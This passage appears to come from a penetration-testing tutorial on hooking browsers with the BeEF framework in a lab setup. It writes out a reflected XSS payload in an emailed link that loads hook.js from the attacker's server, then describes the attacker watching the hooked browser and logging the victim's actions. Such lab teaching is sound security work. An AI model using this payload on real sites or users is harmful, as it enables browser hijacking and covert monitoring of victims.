BeEF needs the client browser to call the hook.js file, which is the one that hooks the browser to our BeEF server and we will use an application vulnerable to XSS to make the user call it:
- Imagine that you are the victim; you have received an email containing a link to http://192.168.56.11/bodgeit/search.jsp?q=<script src="http://192.168.56.10:3000/hook.js"></script> and you browse to that link.
- Now, in the BeEF panel, the attacker will see a new online browser:
- If we check the Logs tab in the browser, we may see that BeEF is storing information about the actions the user is performing in the browser's window, such as ...